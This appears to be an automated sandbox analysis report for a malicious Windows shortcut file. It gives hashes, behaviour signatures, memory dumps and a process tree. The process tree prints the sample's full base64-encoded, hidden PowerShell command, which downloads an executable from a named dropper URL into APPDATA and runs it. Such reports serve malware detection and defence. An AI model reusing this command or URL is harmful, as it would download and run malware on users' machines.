Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    05/05/2024, 09:16

General

  • Target

    16fcea378d2b978e09b4248aff84e4c2_JaffaCakes118.lnk

  • Size

    3KB

  • MD5

    16fcea378d2b978e09b4248aff84e4c2

  • SHA1

    31c076693fcbce870fe3746c487bf5fa9cb7d489

  • SHA256

    9a9e4919f1185214c0f75050a04d5c6d8ed0a10851a29096dbe13b4c1495225e

  • SHA512

    6ab038f62acc1d456829d6ecda8fcfb8190f64da0f0e113220f592fdc5508248326bcd8eae667d9df9e8646cca1ee4fcc1c1d9e92567e7e7601d4f7c3644e4c0

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://nocs.com.br/wp-content/themes/cake/md2.php

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\16fcea378d2b978e09b4248aff84e4c2_JaffaCakes118.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1072
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe" -WindowStyle Hidden -enc UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgACAAIAAtAG4AbwBwAHIAbwBmAGkAbABlACAALQBjAG8AbQBtAGEAbgBkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBuAG8AYwBzAC4AYwBvAG0ALgBiAHIALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdABoAGUAbQBlAHMALwBjAGEAawBlAC8AbQBkADIALgBwAGgAcAAiACwAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE0ARAAyADAAMgAyADMAOQAuAGUAeABlACIAKQA7AE4AZQB3AC0ASQB0AGUAbQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABhACIAIAAtAHQAeQBwAGUAIABmAGkAbABlACAALQBmAG8AcgBjAGUAIAAtAHYAYQBsAHUAZQAgACIARgA0ADAANgBEADYAMAAxADAARAAwAEQAMAA5ADAAQwBEADMAQwA4AEMAOAAwAEIARgBBADEAMABDADcAMAAwADAAMgAwAEQAMAAxADAARQBGAEIAMABFADAAQwBGAEUAMABCAEYAQwAwADgAMAA3ADAARABGAEUAMAA3ADAARABDADcARgBDADAAOAAwADYAQwA4ADAANgAwADgAMQAzAEYARABGAEUAMABGAEYARgAwADIAMABCAEYARQBGAEYAMAA4ADEAMQBDADgAMAAyADAANwAwAEMAMABEAEYAQQAwADUAMAA1AEYARgBDADgAMAA2AEYAQQAwAEMAMABEAEYARQAwAEIAQwA4AEYAQgAwADIAMAA3ADAAMABGAEUAMABCADAAQwBDADcARgBDAEYAQQBGAEIARAA2ADAANgBGADYARgA0AEYAQQBEADYAQwBBAEQANgBGAEEARgA2AEIAOQBGADQARgBEAEQANgBFADkARABFAEYAMwBEAEEARQA4AEQANgBGAEQARgA2AEYANAAwAEQARAA2AEQAQwBGADEAQwA2AEUAMgBFADcARABGAEQARQBEAEMARQBEAEMAOQBDAEEARAA2ADAARABGADYAIgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATQBEADIAMAAyADIAMwA5AC4AZQB4AGUAOwA=
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2688

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/2688-38-0x000007FEF571E000-0x000007FEF571F000-memory.dmp

          Filesize

          4KB

        • memory/2688-39-0x000000001B620000-0x000000001B902000-memory.dmp

          Filesize

          2.9MB

        • memory/2688-43-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

          Filesize

          9.6MB

        • memory/2688-42-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

          Filesize

          9.6MB

        • memory/2688-41-0x00000000026D0000-0x00000000026D8000-memory.dmp

          Filesize

          32KB

        • memory/2688-40-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

          Filesize

          9.6MB

        • memory/2688-44-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

          Filesize

          9.6MB

        • memory/2688-45-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

          Filesize

          9.6MB

        • memory/2688-47-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

          Filesize

          9.6MB